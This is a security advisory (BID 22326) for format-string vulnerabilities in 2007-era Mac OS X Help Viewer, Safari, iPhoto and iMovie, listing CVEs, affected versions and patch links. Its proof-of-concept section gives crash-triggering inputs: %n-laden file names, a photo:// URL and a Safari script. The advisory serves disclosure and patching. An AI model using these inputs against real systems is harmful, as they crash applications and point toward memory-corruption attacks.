BID:22326 - Apple Mac OS X Multiple Products Format String Vulnerabilities

Apple Mac OS X Multiple Products Format String Vulnerabilities

BID:22326

Info

Apple Mac OS X Multiple Products Format String Vulnerabilities

Bugtraq ID:	22326
Class:	Input Validation Error
CVE:	CVE-2007-0646 CVE-2007-0644 CVE-2007-0645 CVE-2007-0647
Remote:	Yes
Local:	No
Published:	Jan 30 2007 12:00AM
Updated:	Jul 06 2016 02:40PM
Credit:	Discovered by LMH <[email protected]> and KF.
Vulnerable:	Apple Safari 2.0.4 Apple Mac OS X Server 10.4.10 Apple Mac OS X Server 10.4.9 Apple Mac OS X Server 10.4.8 Apple Mac OS X Server 10.4.7 Apple Mac OS X Server 10.4.6 Apple Mac OS X Server 10.4.5 Apple Mac OS X Server 10.4.4 Apple Mac OS X Server 10.4.3 Apple Mac OS X Server 10.4.2 Apple Mac OS X Server 10.4.1 Apple Mac OS X Server 10.4 Apple Mac OS X Server 10.3.9 Apple Mac OS X 10.4.10 Apple Mac OS X 10.4.9 Apple Mac OS X 10.4.8 Apple Mac OS X 10.4.7 Apple Mac OS X 10.4.6 Apple Mac OS X 10.4.5 Apple Mac OS X 10.4.4 Apple Mac OS X 10.4.3 Apple Mac OS X 10.4.2 Apple Mac OS X 10.4.1 Apple Mac OS X 10.4 Apple Mac OS X 10.3.9 Apple iPhoto 6.0.5 (316) Apple iMovie HD 6.0.3 Apple Help Viewer 3.0

Not Vulnerable:	Apple Mac OS X Server 10.4.11 Apple Mac OS X 10.4.11

Discussion

Apple Mac OS X Multiple Products Format String Vulnerabilities

Multiple products for Mac OS X are prone to multiple remote format-string vulnerabilities. The affected applications include Help Viewer, Safari, iPhoto, and iMovie.

Exploiting these issues can allow attacker-supplied data to be written to arbitrary memory locations, which can facilitate the execution of arbitrary machine code with the privileges of a targeted application. Failed exploit attempts will likely crash the application.

Help Viewer 3.0.0, Safari 2.0.4, iMovie HD 6.0.3, and iPhoto 6.0.5 are reported affected; other versions may be vulnerable as well.

Exploit / POC

Apple Mac OS X Multiple Products Format String Vulnerabilities

Reports indicate that this issue is being exploited in the wild.

Proofs of concept that trigger crashes are available:

iMovie:
touch %n%n%n%n%n%n%n%n%n%n%n.imovieproj
open %n%n%n%n%n%n%n%n%n%n%n.imovieproj

Help Viewer:
touch %n%n%n%n%n%n%n%n%n%n%n.help
open %n%n%n%n%n%n%n%n%n%n%n.help

iPhoto:
open 'photo://%25n%25n%25n%25n%25n%25n'

Safari:
<script>
window.console.log('%n%n%nOh it takes a montage%n%n%n')
</script>

Solution / Fix

Apple Mac OS X Multiple Products Format String Vulnerabilities

Solution:
The vendor has released Apple Security Update 2007-004 and fixes to address some of these issues. Please see the references for details.

UPDATE: The vendor released Apple Security Update 2007-008 and fixes to address some of these issues. Please see the referenced advisory for more information.

Apple Mac OS X 10.3.9

Apple Security Update 2007-004 (10.3.9 Server)
http://wsidecar.apple.com/cgi-bin/nph-reg3rdpty2.pl/product=13655&cat= 1&platform=osx&method=sa/SecUpdSrvr2007-004Pan.dmg

Apple Security Update 2007-004 (10.3.9 Client)
http://wsidecar.apple.com/cgi-bin/nph-reg3rdpty2.pl/product=13657&cat= 1&platform=osx&method=sa/SecUpd2007-004Pan.dmg

Apple Mac OS X 10.4.1

Apple Mac OS X 10.4.11 Combo Update (Intel)
http://wsidecar.apple.com/cgi-bin/nph-reg3rdpty2.pl/product=16036&cat= 1&platform=osx&method=sa/MacOSXUpdCombo10.4.11Intel.dmg

Apple Mac OS X 10.4.11 Combo Update (PPC)
http://wsidecar.apple.com/cgi-bin/nph-reg3rdpty2.pl/product=16051&cat= 1&platform=osx&method=sa/MacOSXUpdCombo10.4.11PPC.dmg

Apple Mac OS X 10.4.10

Apple Mac OS X 10.4.11 Combo Update (Intel)
http://wsidecar.apple.com/cgi-bin/nph-reg3rdpty2.pl/product=16036&cat= 1&platform=osx&method=sa/MacOSXUpdCombo10.4.11Intel.dmg

Apple Mac OS X 10.4.11 Combo Update (PPC)
http://wsidecar.apple.com/cgi-bin/nph-reg3rdpty2.pl/product=16051&cat= 1&platform=osx&method=sa/MacOSXUpdCombo10.4.11PPC.dmg

Apple Mac OS X 10.4.2

Apple Mac OS X 10.4.11 Combo Update (Intel)
http://wsidecar.apple.com/cgi-bin/nph-reg3rdpty2.pl/product=16036&cat= 1&platform=osx&method=sa/MacOSXUpdCombo10.4.11Intel.dmg

Apple Mac OS X 10.4.11 Combo Update (PPC)
http://wsidecar.apple.com/cgi-bin/nph-reg3rdpty2.pl/product=16051&cat= 1&platform=osx&method=sa/MacOSXUpdCombo10.4.11PPC.dmg

Apple Mac OS X 10.4.3

Apple Mac OS X 10.4.11 Combo Update (Intel)
http://wsidecar.apple.com/cgi-bin/nph-reg3rdpty2.pl/product=16036&cat= 1&platform=osx&method=sa/MacOSXUpdCombo10.4.11Intel.dmg

Apple Mac OS X 10.4.11 Combo Update (PPC)
http://wsidecar.apple.com/cgi-bin/nph-reg3rdpty2.pl/product=16051&cat= 1&platform=osx&method=sa/MacOSXUpdCombo10.4.11PPC.dmg

Apple Mac OS X 10.4.4

Apple Mac OS X 10.4.11 Combo Update (Intel)
http://wsidecar.apple.com/cgi-bin/nph-reg3rdpty2.pl/product=16036&cat= 1&platform=osx&method=sa/MacOSXUpdCombo10.4.11Intel.dmg

Apple Mac OS X 10.4.11 Combo Update (PPC)
http://wsidecar.apple.com/cgi-bin/nph-reg3rdpty2.pl/product=16051&cat= 1&platform=osx&method=sa/MacOSXUpdCombo10.4.11PPC.dmg

Apple Mac OS X 10.4.5

Apple Mac OS X 10.4.11 Combo Update (Intel)
http://wsidecar.apple.com/cgi-bin/nph-reg3rdpty2.pl/product=16036&cat= 1&platform=osx&method=sa/MacOSXUpdCombo10.4.11Intel.dmg

Apple Mac OS X 10.4.11 Combo Update (PPC)
http://wsidecar.apple.com/cgi-bin/nph-reg3rdpty2.pl/product=16051&cat= 1&platform=osx&method=sa/MacOSXUpdCombo10.4.11PPC.dmg

Apple Mac OS X 10.4.6

Apple Mac OS X 10.4.11 Combo Update (Intel)
http://wsidecar.apple.com/cgi-bin/nph-reg3rdpty2.pl/product=16036&cat= 1&platform=osx&method=sa/MacOSXUpdCombo10.4.11Intel.dmg

Apple Mac OS X 10.4.11 Combo Update (PPC)
http://wsidecar.apple.com/cgi-bin/nph-reg3rdpty2.pl/product=16051&cat= 1&platform=osx&method=sa/MacOSXUpdCombo10.4.11PPC.dmg

Apple Mac OS X 10.4.7

Apple Mac OS X 10.4.11 Combo Update (Intel)
http://wsidecar.apple.com/cgi-bin/nph-reg3rdpty2.pl/product=16036&cat= 1&platform=osx&method=sa/MacOSXUpdCombo10.4.11Intel.dmg

Apple Mac OS X 10.4.11 Combo Update (PPC)
http://wsidecar.apple.com/cgi-bin/nph-reg3rdpty2.pl/product=16051&cat= 1&platform=osx&method=sa/MacOSXUpdCombo10.4.11PPC.dmg

Apple Mac OS X 10.4.8

Apple Mac OS X 10.4.11 Combo Update (Intel)
http://wsidecar.apple.com/cgi-bin/nph-reg3rdpty2.pl/product=16036&cat= 1&platform=osx&method=sa/MacOSXUpdCombo10.4.11Intel.dmg

Apple Mac OS X 10.4.11 Combo Update (PPC)
http://wsidecar.apple.com/cgi-bin/nph-reg3rdpty2.pl/product=16051&cat= 1&platform=osx&method=sa/MacOSXUpdCombo10.4.11PPC.dmg

Apple Mac OS X Server 10.4.9

Apple Security Update 2007-004 (Universal)
http://wsidecar.apple.com/cgi-bin/nph-reg3rdpty2.pl/product=13659&cat= 1&platform=osx&method=sa/SecUpd2007-004Univ.dmg

Apple Mac OS X 10.4.9

Apple Mac OS X 10.4.11 Combo Update (Intel)
http://wsidecar.apple.com/cgi-bin/nph-reg3rdpty2.pl/product=16036&cat= 1&platform=osx&method=sa/MacOSXUpdCombo10.4.11Intel.dmg

Apple Mac OS X 10.4.11 Combo Update (PPC)
http://wsidecar.apple.com/cgi-bin/nph-reg3rdpty2.pl/product=16051&cat= 1&platform=osx&method=sa/MacOSXUpdCombo10.4.11PPC.dmg

Apple Security Update 2007-004 (Universal)
http://wsidecar.apple.com/cgi-bin/nph-reg3rdpty2.pl/product=13659&cat= 1&platform=osx&method=sa/SecUpd2007-004Univ.dmg

References

Apple Mac OS X Multiple Products Format String Vulnerabilities

References:

Chinese Weekend Compromise (Trend Micro)
Cisco TelePresence Video Communication Server (VCS) Homepage (Cisco)
JS_IFRAME.AD (Trend Micro)
MOAB-30-01-2007: Multiple Apple Software Format String Vulnerabilities (LMH )
APPLE-SA-2007-04-19 Security Update 2007-004 (Apple)